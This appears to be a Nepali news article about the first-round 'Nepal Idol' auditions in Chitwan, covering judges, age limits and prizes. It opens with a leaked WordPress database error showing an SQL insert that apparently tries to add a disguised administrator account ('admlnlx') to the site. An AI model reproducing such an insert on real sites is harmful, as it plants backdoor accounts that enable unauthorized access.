WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BBap1OPxKkg7WBqH2vB7Pyk4a9v5aX1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 06:31:24', '', 'admlnlx', 'admlnlx')
चितवन, माघ १८–
चितवनको नारायणगढमा मंगलबार भएको ‘नेपाल आईडल’को पहिलो चरणको अडिसन भव्य बनेको छ ।
नेपाल आईडल बन्ने सपना बोकेर पुगेका सयौं युवाहरुमा निकै उत्साह देखिन्थ्यो । करिव दिउँसोको पौने १ बजे बालकुमारी उच्च माध्यमिक विद्यालयको मूख्य गेट खुल्ने वित्तिकै युवाहरु दौडिदै भित्र प्रवेश गरेका थिए । आज पहिलो दिन सयौंले अडिसनमा सहभागिता जनाएको आयोजकले जनाएको छ । आज छनौट भएकाहरुको भोली सौराहामा फेरी अर्को अडिसन एपिवान टेलिभिजनका चितवन ब्यूरो प्रमुख अनिल ढकालले जानकारी दिए । त्यसपश्चात छनौट भएकाहरु काठमाडौं जान पाउने छन् ।

भोली हुने अडिसनको निर्णायकहरुमा कालीप्रसाद बास्कोटा, इन्जिरा जोशी र निहुँ बज्राचार्य हुनेछन् ।
नेपाल कै सर्वाधिक ठूलो गायन प्रतिभाको खोजी ‘नेपाल आईडल’को अन्नपुूर्ण मिडिया नेटवर्कको एपी वान टेलिभिजनले आयोजना गरेको हो । नेपालका मुख्य शहरहरुमा अडिसन गर्ने क्रममा टोली चितवन आईपुगेको हो । नेपाल आईडलको यसअघि नेपालगञ्ज र बुटवलमा अडिसन भएको थियो ।

सो अडिसनमा १६ वर्ष देखि ३० वर्ष उमेर समूहले आईडलमा सहभागि हुन सक्नेछन् । नेपाल आईडल विजेताले महिन्द्रा केयुभि कार, २० लाख नगद र १५ लाख बराबरको भिडियो एल्बम बनाउन पाउने छ ।













